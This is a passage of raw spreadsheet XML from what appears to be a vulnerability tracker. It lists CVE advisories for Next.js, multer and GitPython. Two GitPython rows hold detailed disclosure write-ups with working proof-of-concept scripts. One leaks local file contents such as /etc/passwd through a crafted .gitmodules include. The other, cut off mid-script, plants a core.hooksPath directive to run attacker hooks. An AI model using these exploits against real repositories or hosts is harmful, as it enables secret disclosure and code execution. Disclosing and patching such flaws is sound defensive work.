t="inlineStr"><is><t>## Impact

A vulnerability in applications using Pages and App router without Cache Component can lead to remote code execution when the server is hosted on machines using a Windows filesystem.

## Workaround

There is no known workaround for affected windows-hosted applications. You should upgrade immediately if your server is hosted on Windows.</t></is></c><c r="T1595" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75604</t></is></c></row><row r="1596"><c r="A1596" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1596" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1596" s="5" t="inlineStr"><is><t>CVE-2026-77037</t></is></c><c r="D1596" s="5" t="inlineStr" /><c r="E1596" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1596" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1596" s="5" t="inlineStr" /><c r="H1596" s="5" t="n"><v>0.003</v></c><c r="I1596" s="5" t="inlineStr" /><c r="J1596" s="5" t="inlineStr" /><c r="K1596" s="5" t="inlineStr" /><c r="L1596" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M1596" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N1596" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1596" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1596" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1596" s="5" t="inlineStr" /><c r="R1596" s="5" t="inlineStr" /><c r="S1596" s="5" t="inlineStr"><is><t>### Impact

A vulnerability in multer `2.2.0` allows an attacker to trigger a Denial of Service (DoS) by aborting or truncating multipart uploads. When using `diskStorage`, the destination write stream is not closed if the upload is aborted before it finishes, so each failed request leaks an open file descriptor and retains its disk blocks until the process exits. Repeated failed uploads can exhaust the available file descriptors. All applications using multer's disk storage are affected.

### Patches

Users should upgrade to `2.3.0`.

### Workarounds

None.</t></is></c><c r="T1596" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77037</t></is></c></row><row r="1597"><c r="A1597" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1597" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1597" s="5" t="inlineStr"><is><t>CVE-2026-77063</t></is></c><c r="D1597" s="5" t="inlineStr" /><c r="E1597" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1597" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1597" s="5" t="inlineStr" /><c r="H1597" s="5" t="n"><v>0.002</v></c><c r="I1597" s="5" t="inlineStr" /><c r="J1597" s="5" t="inlineStr" /><c r="K1597" s="5" t="inlineStr" /><c r="L1597" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M1597" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N1597" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1597" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1597" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1597" s="5" t="inlineStr" /><c r="R1597" s="5" t="inlineStr" /><c r="S1597" s="5" t="inlineStr"><is><t>### Impact

When `multer` is configured with an asynchronous `fileFilter`, the `limits.fileSize` limit can be bypassed. The `'limit'` event is registered inside the async `fileFilter` callback, so if a file exceeds `limits.fileSize` before that callback runs, the event is missed and the oversized upload is accepted instead of being rejected with a `LIMIT_FILE_SIZE` error. Applications that rely on `limits.fileSize` to reject oversized uploads are affected on all upload methods (`.single()`, `.array()`, `.fields()`, `.any()`). Uploads using a synchronous `fileFilter` are not affected.

### Patches

Users should upgrade to `2.3.0`.

### Workarounds

Use a synchronous `fileFilter`, or validate the uploaded file size after the upload completes.</t></is></c><c r="T1597" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77063</t></is></c></row><row r="1598"><c r="A1598" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1598" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1598" s="5" t="inlineStr"><is><t>CVE-2026-77078</t></is></c><c r="D1598" s="5" t="inlineStr" /><c r="E1598" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1598" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1598" s="5" t="inlineStr" /><c r="H1598" s="5" t="n"><v>0.003</v></c><c r="I1598" s="5" t="inlineStr" /><c r="J1598" s="5" t="inlineStr" /><c r="K1598" s="5" t="inlineStr" /><c r="L1598" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M1598" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N1598" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1598" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1598" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1598" s="5" t="inlineStr" /><c r="R1598" s="5" t="inlineStr" /><c r="S1598" s="5" t="inlineStr"><is><t>### Impact

A vulnerability in multer allows a remote, unauthenticated attacker to crash the Node.js process with a single `multipart/form-data` request. Two specially crafted text field names cause an uncaught `RangeError: Invalid array length` inside multer's field parsing, which is not routed to the application error handler and terminates the process. All applications using multer to parse multipart requests are affected.

### Patches

Users should upgrade to `2.3.0`.

### Workarounds

None.</t></is></c><c r="T1598" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77078</t></is></c></row><row r="1599"><c r="A1599" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1599" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1599" s="5" t="inlineStr"><is><t>CVE-2026-7809</t></is></c><c r="D1599" s="5" t="inlineStr" /><c r="E1599" s="5" t="inlineStr" /><c r="F1599" s="5" t="inlineStr" /><c r="G1599" s="5" t="inlineStr" /><c r="H1599" s="5" t="inlineStr" /><c r="I1599" s="5" t="inlineStr" /><c r="J1599" s="5" t="inlineStr" /><c r="K1599" s="5" t="inlineStr" /><c r="L1599" s="5" t="inlineStr" /><c r="M1599" s="5" t="inlineStr" /><c r="N1599" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1599" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1599" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1599" s="5" t="inlineStr" /><c r="R1599" s="5" t="inlineStr" /><c r="S1599" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1599" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-7809</t></is></c></row><row r="1600"><c r="A1600" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1600" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1600" s="5" t="inlineStr"><is><t>CVE-2026-78675</t></is></c><c r="D1600" s="5" t="inlineStr" /><c r="E1600" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1600" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1600" s="5" t="inlineStr" /><c r="H1600" s="5" t="n"><v>0.001</v></c><c r="I1600" s="5" t="inlineStr" /><c r="J1600" s="5" t="inlineStr" /><c r="K1600" s="5" t="inlineStr" /><c r="L1600" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1600" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1600" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1600" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1600" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1600" s="5" t="inlineStr" /><c r="R1600" s="5" t="inlineStr" /><c r="S1600" s="5" t="inlineStr"><is><t># [HIGH] Arbitrary local file content disclosure via `[include]` directive in untrusted `.gitmodules` (`SubmoduleConfigParser` never disables `merge_includes`)

- **CWE:** CWE-200 (Exposure of Sensitive Information) / CWE-73 (External Control of File Name or Path)
- **Affected component:** `git/objects/submodule/base.py`, `Submodule._config_parser()` (~line 273) constructing `SubmoduleConfigParser(fp_module, read_only=read_only)`; `git/config.py`, `GitConfigParser.__init__` (`merge_includes` default), `GitConfigParser.read()`/`_included_paths()` (include-path resolution, ~lines 630-685), `GitConfigParser._read()` (~line 493-498, `MissingSectionHeaderError`)
- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)

## Reachability
`GitConfigParser.__init__` defaults `merge_includes=True`: any config file it parses has its `[include]` (and, when a `repo=` is supplied, `[includeIf ...]`) directives followed and merged in. The maintainers already recognized this as dangerous for one specific case and fixed it in commit `41ecc6a4` ("Disable merge_includes in config writers"), which passes `merge_includes=False` when `Repo.config_writer()` builds its parser (`git/repo/base.py`).

That fix never touched `Submodule._config_parser()`. This method builds the parser used for **every** read of a repo's submodule configuration — `repo.submodules`, `Submodule.iter_items()`, `Submodule.config()` — via `SubmoduleConfigParser(fp_module, read_only=read_only)`, passing neither `merge_includes=False` nor `repo=`. The `True` class default is therefore inherited unchanged, and `fp_module` here is `.gitmodules` — **the single most attacker-controlled config file in the entire codebase**, since it ships verbatim as tracked content inside any cloned repository.

`GitConfigParser.read()`'s include-path resolution (~line 662-680) performs no containment check: `osp.isabs(include_path)` short-circuits the path join entirely for an absolute path, and a relative path is joined with `osp.join(osp.dirname(file_path), include_path)` / `osp.normpath()`'d with no check that the result stays under the repository. `~` is expanded via `osp.expanduser`. The only gate before opening is `os.access(include_path, os.R_OK)` — a readability check, not a path restriction.

Once opened, `GitConfigParser._read()` parses the target file as git-config INI. If the first non-blank/non-comment line is not a `[section]` header — true of virtually any non-gitconfig file (source code, `/etc/passwd`, `.env` files, credential files, logs, JSON/YAML) — it raises `configparser.MissingSectionHeaderError(fpname, lineno, line)`. Python's stdlib formats this exception's `str()` as `"File contains no section headers.\nfile: %r, line: %d\n%r" % (fpname, lineno, line)` — it embeds the **verbatim content** of that file's first line in the exception message. `Submodule.iter_items()` catches only `(IOError, BadName)`, not `configparser.Error`, so this exception propagates straight out of the ordinary, read-only `repo.submodules` call.

## Root cause
Parity gap between two config-parser construction sites for the exact same footgun: `Repo.config_writer()` was hardened against `merge_includes` in 2023 (`41ecc6a4`); `Submodule._config_parser()` — which parses `.gitmodules`, content that is *always* attacker-controlled the moment a repository is cloned from an untrusted source — was never given the same treatment. (The submodule *write*-mode config parser at `git/objects/submodule/base.py` for `.git/modules/&lt;name&gt;/config` — a different, locally-generated file — has correctly passed `merge_includes=False` since 2022, underscoring that the omission for `.gitmodules` reads looks like an oversight rather than a considered exception.)

## Exploit path
1. Attacker crafts a repository whose `.gitmodules` contains a legitimate-looking `[submodule ...]` section plus:
   ```
   [include]
   	path = /etc/passwd
   ```
   (an absolute path bypasses any traversal reasoning entirely; a relative `../../../../etc/passwd`-style path works too).
2. Victim performs the extremely common, entirely read-only operation of enumerating a cloned repo's submodules: `list(repo.submodules)` (or any `for sm in repo.submodules`) — no `update()`, `init()`, or checkout of any kind required.
3. `SubmoduleConfigParser` (inheriting `merge_includes=True`) follows the `[include]` directive, opens `/etc/passwd`, and `GitConfigParser._read()` raises `MissingSectionHeaderError` whose message embeds `/etc/passwd`'s first line verbatim.
4. This exception surfaces wherever the host application observes exceptions from GitPython — CI logs, error pages, exception trackers, or any dependency-scanner/code-review-bot/hosting-platform tool built on `repo.submodules` — disclosing the targeted file's first line to the attacker (directly, or indirectly via any channel that echoes the error).

## Impact
Non-blind local file content disclosure (first line) of any file readable by the victim process, triggered purely by attacker-controlled repository content and one routine, read-only GitPython call. Bounded to one line per triggering file (parsing aborts at the first `MissingSectionHeaderError`), but that line very often *is* the secret — `.env` files (`DATABASE_URL=...`, `API_KEY=...`), single-line credential/token files, `/etc/passwd`'s root entry for host fingerprinting. The primitive additionally serves as a generic error-based file-existence oracle for arbitrary host paths. This is materially stronger than the already-fixed, explicitly **blind** `GHSA-cwvm-v4w8-q58c` ("Blind local file inclusion", CVSS 4.0, `git/refs/symbolic.py` ref-name resolution) — that advisory's own writeup states it cannot disclose content; this one does, verbatim, via a different module (`git/config.py`'s include resolution).

## Preconditions
- Victim clones (or otherwise opens with GitPython) a repository whose `.gitmodules` is attacker-controlled — the default trust model for any tool that processes third-party repositories (dependency scanners, CI, code hosting/review bots, "audit this repo" utilities — exactly the class of application GitPython itself is built for).
- Victim performs any operation that touches `repo.submodules` — one of the most ordinary GitPython operations, requiring no submodule `update`/`init`/checkout.
- No authentication/role requirement inside GitPython itself.

## Evidence
- `git/config.py` — `GitConfigParser.__init__` defaults `merge_includes=True`.
- `git/objects/submodule/base.py:273` — `SubmoduleConfigParser(fp_module, read_only=read_only)` passes neither `merge_includes` nor `repo=`; `git blame` shows this call unchanged since the class was introduced, and `git show 41ecc6a4` confirms that commit touched only `git/repo/base.py`'s `Repo.config_writer()`, never this call site.
- `git/config.py` `_included_paths()`/`read()` (~630-685) — absolute include paths bypass the join/normpath entirely (`osp.isabs()` short-circuit); no repository-boundary containment check exists anywhere in this path.
- `git/config.py` `_read()` (~493-498) — raises `cp.MissingSectionHeaderError(fpname, lineno, line)` with the raw file line embedded, matching Python stdlib `configparser`'s own `__str__` behavior.
- `Submodule.iter_items()` catches only `(IOError, BadName)` — `configparser.Error` (the base of `MissingSectionHeaderError`) is not swallowed.
- PoC (`gitpython-003-poc.py`, embedded below) reproduces this end-to-end against this exact checkout via the public API only (`Repo.clone_from` + `list(repo.submodules)`, default arguments, no monkeypatching), against both a throwaway secret file and `/etc/passwd`.

## False-positive check (adversarial re-read)
- **Is this the same bug as `GHSA-hmq2-w58f-27jc`?** No — that advisory is about the `.gitmodules` submodule *name* driving `_module_abspath`/`os.makedirs()` (creating a git repository/module directory outside the working tree, a write/RCE-adjacent primitive via a completely different function). This finding is about the `[include]` directive in the *same file* reaching a config-parser read primitive — a different mechanism, different function, different impact class (content disclosure, not directory creation).
- **Is this the same bug as `GHSA-cwvm-v4w8-q58c` (blind LFI)?** No — that advisory is explicitly documented by its own reporter as content-free/blind (existence-only), and lives in `git/refs/symbolic.py`'s ref-name resolution feeding `Repo.commit`/`tree`/`index.diff` — an entirely different module and code path. This finding discloses actual file content via `git/config.py`'s include-directive resolution.
- **Is the impact overstated given only one line leaks?** No — this is an accurate scoping caveat already reflected in the severity/impact discussion, not a reachability blocker: attacker has full control over which path is targeted (absolute paths work unconditionally), requires zero interaction beyond the single most common submodule operation, and the PoC demonstrates a real, working end-to-end disclosure through the standard `clone_from` + `list(repo.submodules)` workflow.
- **Could the exception simply be silently swallowed by GitPython before reaching the caller?** No — confirmed by reading `Submodule.iter_items()`'s exception handling, which catches only `IOError`/`BadName`; `configparser.MissingSectionHeaderError` propagates uncaught.
- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently against both a throwaway secret file and `/etc/passwd`.

## Remediation
Pass `merge_includes=False` when constructing `SubmoduleConfigParser` in `Submodule._config_parser()` (`git/objects/submodule/base.py`), mirroring the existing fix in `Repo.config_writer()` (commit `41ecc6a4`) — `.gitmodules` content is always attacker-controlled and should never be allowed to pull in `include`/`includeIf` directives. As defense in depth, `GitConfigParser.read()`'s include-path resolution should enforce that resolved include paths stay within the repository's own directory tree, and parsing-error messages (`MissingSectionHeaderError`/`ParsingError`) should avoid embedding raw file content when parsing a file the caller did not explicitly ask to open.

## Confidence
High. Root cause confirmed by direct code reading across both `git/config.py` and `git/objects/submodule/base.py`, cross-checked against the fix commit that hardened the sibling code path but not this one; exploit chain reproduced independently, twice, against the current HEAD (a throwaway secret file and `/etc/passwd`).


## Proof-of-Concept source (`gitpython-003-poc.py`)

```python
#!/usr/bin/env python3
"""
GITPYTHON-003 PoC: `.gitmodules` -- fully attacker-controlled content shipped
inside a cloned repository -- can contain `[include] path = &lt;any local path&gt;`.
`Submodule._config_parser()` builds the parser used for `repo.submodules` (and
other submodule reads) via `SubmoduleConfigParser(fp_module, read_only=...)`
without passing `merge_includes=False`, so the class default `merge_includes=True`
is inherited. GitConfigParser then opens the target file; if it isn't valid
git-config syntax (true of virtually any non-gitconfig file), Python's
`configparser.MissingSectionHeaderError` embeds the file's first line verbatim
in its exception message, which propagates out of the ordinary, read-only
`repo.submodules` call -- a non-blind local file content disclosure primitive.

Run:
  PYTHONPATH="&lt;repo&gt;:&lt;repo&gt;/gitdb:&lt;repo&gt;/smmap" python3 gitpython-003-poc.py &lt;workdir&gt; &lt;target-file&gt;

Benign: reads only the given &lt;target-file&gt; (defaults to a throwaway secret file
created under &lt;workdir&gt; if omitted) and never writes/exfiltrates it anywhere
except printing it locally to prove the primitive. No destructive action.
"""
import os
import subprocess
import sys


def main():
    workdir = sys.argv[1] if len(sys.argv) &gt; 1 else "/tmp/gitpython-003-poc"
    target_file = sys.argv[2] if len(sys.argv) &gt; 2 else os.path.join(workdir, "secret.txt")

    attacker_repo = os.path.join(workdir, "attacker-repo")
    dest = os.path.join(workdir, "dest")
    for p in (attacker_repo, dest):
        os.makedirs(p, exist_ok=True)

    if not os.path.exists(target_file):
        os.makedirs(os.path.dirname(target_file), exist_ok=True)
        with open(target_file, "w") as f:
            f.write("TOP-SECRET-DB-PASSWORD=hunter2-actual-secret-value\n")

    subprocess.run(["git", "init", "-q", "-b", "main", attacker_repo], check=True)
    subprocess.run(["git", "-C", attacker_repo, "config", "user.email", "a@example.com"], check=True)
    subprocess.run(["git", "-C", attacker_repo, "config", "user.name", "Attacker"], check=True)

    with open(os.path.join(attacker_repo, "file.txt"), "w") as f:
        f.write("hello\n")

    with open(os.path.join(attacker_repo, ".gitmodules"), "w") as f:
        f.write(
            '[submodule "totally-normal-dep"]\n'
            "\tpath = vendor/dep\n"
            "\turl = https://example.com/dep.git\n"
            "[include]\n"
            "\tpath = %s\n" % target_file
        )

    subprocess.run(["git", "-C", attacker_repo, "add", "file.txt", ".gitmodules"], check=True)
    subprocess.run(["git", "-C", attacker_repo, "commit", "-q", "-m", "init"], check=True)

    import git  # gitpython under test
    import configparser

    repo = git.Repo.clone_from(attacker_repo, dest)

    try:
        subs = list(repo.submodules)
        print("NOT VULNERABLE: no exception raised, submodules =", subs)
        sys.exit(1)
    except configparser.MissingSectionHeaderError as e:
        msg = str(e)
        print("VULNERABLE: MissingSectionHeaderError leaked file content via repo.submodules:")
        print(msg)
        with open(target_file) as f:
            first_line = f.readline().rstrip("\n")
        if first_line in msg:
            print("Confirmed: target file's first line is present verbatim in the exception message.")
            sys.exit(0)
        else:
            print("NOT VULNERABLE: exception message did not contain the expected content")
            sys.exit(1)


if __name__ == "__main__":
    main()

```</t></is></c><c r="T1600" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78675</t></is></c></row><row r="1601"><c r="A1601" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1601" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1601" s="5" t="inlineStr"><is><t>CVE-2026-78676</t></is></c><c r="D1601" s="5" t="inlineStr" /><c r="E1601" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1601" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1601" s="5" t="inlineStr" /><c r="H1601" s="5" t="n"><v>0.004</v></c><c r="I1601" s="5" t="inlineStr" /><c r="J1601" s="5" t="inlineStr" /><c r="K1601" s="5" t="inlineStr" /><c r="L1601" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1601" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1601" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1601" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1601" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1601" s="5" t="inlineStr" /><c r="R1601" s="5" t="inlineStr" /><c r="S1601" s="5" t="inlineStr"><is><t>- **CWE:** CWE-88 (Argument Injection) / CWE-94 (Code Injection) — via a read-then-corrupt-on-rewrite config round trip, not a direct setter argument
- **Affected component:** `git/config.py` — `GitConfigParser._read()` (multi-line value decoding, lines 444-541, esp. `string_decode()` at line 460 and its call sites at 519/541) and `GitConfigParser._write()`/`write_section()` (serialization, lines ~694-712, esp. line 708)
- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)

## Reachability
GitPython added `UNSAFE_CONFIG_CHARS_RE` / `_value_to_string_safe()` / `_assure_config_name_safe()` guards (commits `c417af46`, `1ed1b924`, `a495ccd3`, and PR #2176) to reject a Python string containing a raw `\r`/`\n`/NUL byte, or syntax-bearing characters, when it is passed as an **argument** to `set()`, `set_value()`, `add_value()`, or `add_section()`. This closed the four config-injection GHSAs above.

That guard is applied only on the write-argument surface. It is never consulted for values that entered `GitConfigParser._sections` via `_read()` — i.e. values that came from parsing an on-disk config file. And `_read()` legitimately supports standard, spec-compliant git config syntax for multi-line values: a quoted value that is not closed on the same physical line continues onto the next physical line (git's own backslash-continuation syntax), and `string_decode()` (`.decode('unicode_escape')`) decodes a literal two-character `\n` **escape sequence** inside such a value into a real embedded LF character in the resulting Python string. No raw control byte is ever written to disk to achieve this — it's the same syntax real `git` itself uses and accepts.

The bug is in what happens when that `GitConfigParser` is later **flushed**: `write_section()` (line ~694) calls the *unsafe* `self._value_to_string(v)` — not `_value_to_string_safe()` — and "handles" any embedded newline in the value with `.replace("\n", "\n\t")` (line 708), emitting a bare, unquoted `&lt;real newline&gt;&lt;tab&gt;` in the output file with no re-quoting and no backslash-continuation marker. Real git does **not** treat an indentation-only continuation the way GitPython's writer assumes — a value only continues across physical lines when the *previous* line ends in a literal `\` immediately before the newline. So the moment `write_section()` re-serializes a previously-decoded multi-line value this way, the second half of that value becomes an **independent, new config line** the next time anyone (GitPython or real `git`) parses the file. If an attacker chooses the dormant value's content to be `&lt;anything&gt;\nhooksPath = &lt;attacker path&gt;`, that second line is parsed as a brand-new `core.hooksPath = &lt;attacker path&gt;` directive — live, real Git configuration, not a value.

`core.hooksPath` is honored by essentially every hook-firing git operation (`commit`, `checkout`, `merge`, `push`, `rebase`, ...), giving arbitrary code execution the next time the host application performs any hook-triggering operation.

## Root cause
`GitConfigParser`'s injection guard is asymmetric: it hardens every *write-argument* entry point (the fix for the four sibling GHSAs) but never hardens the **read → corrupt-on-rewrite round trip**. A value that is 100% legitimate and inert as parsed from disk becomes a newly-injected directive purely through GitPython's own broken re-serialization logic (`write_section()` using the unsafe value-to-string path plus a continuation scheme real git doesn't recognize). The `c417af46` commit message even states its intent explicitly: *"This preserves existing read behavior for config files that already contain multiline values while preventing GitPython from writing new unsafe values"* — i.e. the maintainers consciously scoped the fix to the write-argument surface and did not address what happens when an already-resident multi-line value gets rewritten.

## Exploit path
1. A `.git/config` (or any file merged into it via `[include]`, see below) already contains a dormant, syntactically-legitimate multi-line quoted value, e.g.:
   ```
   [core]
   	zzz = "A\nhooksPath = ../evil-hooks\
   "
   ```
   No raw `\r`, `\n`, or NUL byte appears on disk — this is standard git quoting + backslash-continuation. Real `git config --get core.hookspath` returns nothing at this point (inert); `git config --get core.zzz` returns the decoded string `A\nhooksPath = ../evil-hooks`, identically to GitPython's own reader.
2. The host application opens this repo with GitPython (`git.Repo(path)`, `read_only=False` implicitly for a normal `config_writer()` use) and performs **any** single, unrelated, legitimate config write on the same `GitConfigParser` instance — e.g. `repo.config_writer().set_value("user", "name", "Test User")`. This is one of the most ordinary operations a GitPython-based tool performs.
3. `GitConfigParser._write()`/`write_section()` re-serializes every resident value, including the dormant `zzz` entry, using the unsafe path. The file on disk now contains, verbatim:
   ```
   [core]
   	...
   	zzz = A
   	hooksPath = ../evil-hooks
   ```
4. Real `git config --get core.hookspath` now returns `../evil-hooks` — a key that did not exist before step 2, created purely by GitPython's own write.
5. The next hook-firing git operation (e.g. `git commit`) executes `../evil-hooks/pre-commit` (or whatever hook name the operation looks for), i.e. arbitrary attacker-chosen code execution.

## Impact
Arbitrary code execution, on par with (and more directly triggered than) the already-accepted, High-severity `GHSA-mv93-w799-cj2w`/`GHSA-v87r-6q3f-2j67` "Newline injection... enables RCE via core.hooksPath" advisories, and requiring **no unsafe caller argument at all** — only an attacker-influenced config file plus one ordinary, unrelated write.

## Preconditions
- A config file GitPython opens read-write already contains an attacker-chosen, syntactically-valid multi-line value shaped like `&lt;anything&gt;\n&lt;injected-key&gt; = &lt;injected-value&gt;`. Realistic delivery:
  1. **Pre-existing `.git` directory shipped with a repository** — vendored/template repos, CI workspace/layer caches that preserve `.git`, "repo" tarball/zip distributions that include `.git/config`. The poisoned value sits directly in `.git/config`.
  2. **The documented shared-config `[include]` pattern** (`[include] path = ../&lt;repo-tracked-file&gt;`, pointing at a file inside the working tree) — `GitConfigParser.read()` merges included files' sections into the same `_sections` dict used for writing, so a malicious public repository can ship the poisoned value inside a normal tracked file and have it activated the first time any GitPython-based tool performs any unrelated config write after clone (this requires the victim's own `.git/config` to already reference the include, e.g. via project setup tooling that adds `include.path`).
  3. **Any host application that opens an attacker-influenced config file for read-write and later performs a legitimate write** — the exact trust-boundary the maintainers already accepted as realistic for `GHSA-v87r-6q3f-2j67` (their writeup cites MLRun's `project.push()`).
- No authentication/role requirement inside GitPython itself.

## Evidence
- `git/config.py:460` (`string_decode`), invoked at `git/config.py:519` and `:541` inside `_read()`'s multi-line handling — decodes `unicode_escape`, turning a literal `\n` escape into a real embedded LF.
- `git/config.py:~694-712` (`_write()`/`write_section()`) — uses `self._value_to_string(v)` (unsafe variant) and `.replace("\n", "\n\t")` with no re-quoting.
- `c417af46` (the CR/LF/NUL guard commit) touches only the setter path and explicitly states it preserves existing *read* behavior for multi-line values, per its own commit message.
- `git log -S"string_decode"`, `-S"write_section"`, `-S'replace("\n", "\n\t")'` on `git/config.py` show these code paths have only ever been touched by non-security formatting/refactor commits (`a5fc1d86`, `b825dc74`, `cb68eef0`, `21ec5299`), never by a security fix.
- PoC (`gitpython-002-poc.py`, embedded below) reproduces the full chain end-to-end against this exact checkout: dormant value → one unrelated `config_writer()` write → `core.hookspath` becomes live per real `git config --get` → a subsequent `git commit` executes the injected hook and writes a benign marker file.

## False-positive check (adversarial re-read)
- **Is this just a repeat of the four already-fixed config-injection GHSAs?** No — all four require the *caller* to pass a Python string containing a raw control character or forbidden syntax character as an argument to a setter; all four are now blocked by `UNSAFE_CONFIG_CHARS_RE`/`VALID_CONFIG_OPTION_NAME_RE`/the section quote-state-machine. This finding requires no such caller argument: the payload is smuggled entirely inside a config *file* using standard, valid git escaping that the guard never inspects, and only becomes dangerous through GitPython's own unguarded re-serialization of a value it already holds. Confirmed via `_known-advisories.json` (26 entries, none withdrawn) — none describe this read→corrupt-on-rewrite mechanism.
- **Does real git actually round-trip this value safely (i.e. is this a GitPython-only bug, not a "normal" file)?** Yes, confirmed empirically: after the same crafted `.git/config` is rewritten by *real* `git config user.name Test2` (a control test), the multi-line `zzz` entry is preserved byte-for-byte in its original quoted/continuation form — only GitPython's writer corrupts it.
- **Is there a guard elsewhere that would catch the resulting bare `hooksPath = ...` line before it's trusted?** No — once on disk, it is indistinguishable from a directive the user set intentionally; `core.hooksPath` is honored unconditionally by git's hook-invocation machinery.
- **Does this require an unrealistic precondition?** The precondition (a config file with attacker-influenced content, later legitimately rewritten) mirrors the exact threat model the maintainers already treated as realistic and fixed for `GHSA-v87r-6q3f-2j67`.
- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently end-to-end (dormant value in place → benign unrelated `config_writer()` write → `core.hookspath` live per real git → hook fires on `git commit`, marker file written).

## Remediation
Either (a) make `write_section()`/`_write()` use `_value_to_string_safe()` (or equivalent re-quoting) for **every** resident value, including those that originated from `_read()`, so an embedded newline is always re-emitted as a properly quoted+backslash-continued value rather than a bare new line, or (b) reject/neutralize embedded control characters in values at read time before they can reach `_sections` at all if the parser is opened in `read_only=False` mode, or (c) canonicalize output using git's own `git config --file &lt;path&gt; --replace-all` semantics instead of a hand-rolled writer. Option (a) is the most surgical fix and matches the spirit of `_value_to_string_safe()` already used on the setter path.

## Confidence
High. Root cause independently re-derived and confirmed by direct code reading; full exploit chain (dormant value → benign unrelated write → live `core.hookspath` → hook execution with a benign marker) reproduced twice, independently, against the current HEAD.


## Proof-of-Concept source (`gitpython-002-poc.py`)

```python
#!/usr/bin/env python3
"""
GITPYTHON-002 PoC: a dormant, legitimately-encoded multi-line git-config value
(standard quoted + backslash-continuation syntax, containing an escaped "\\n"
that decodes to a real embedded newline in memory) is corrupted into a NEW,
live config key the moment GitConfigParser re-serializes it during any
unrelated write. If the smuggled second "line" looks like
"hooksPath = &lt;attacker path&gt;", it becomes a real, active core.hooksPath after
one unrelated GitPython config write, and fires attacker code on the next
hook-triggering git operation (e.g. `git commit`).

This is CWE-88/CWE-94 style argument/config injection, but via the READ path
(a config file GitPython parses and later rewrites), not via a Python kwarg
argument -- distinct from the already-fixed GHSA-mv93-w799-cj2w /
GHSA-v87r-6q3f-2j67 / GHSA-3rp5-jjmw-4wv2 / GHSA-jm78-9fvv-mhgr, which all
guard the setter-argument surface only.

Run:
  PYTHONPATH="&lt;repo&gt;:&lt;repo&gt;/gitdb:&lt;repo&gt;/smmap" python3 gitpython-002-poc.py &lt;workdir&gt;

Benign: only writes/reads inside &lt;workdir&gt;. The "malicious" hook just writes a
marker file; no destructive/exfiltrating payload. Exits non-zero and prints
"NOT VULNERABLE" if the corruption / hook does not fire.
"""
import os
import subprocess
import sys


def main():
    workdir = sys.argv[1] if len(sys.argv) &gt; 1 else "/tmp/gitpython-002-poc"
    repo_dir = os.path.join(workdir, "repo")
    hooks_dir = os.path.join(workdir, "evil-hooks")
    marker = os.path.join(workdir, "PWNED_MARKER.txt")

    for p in (repo_dir, hooks_dir):
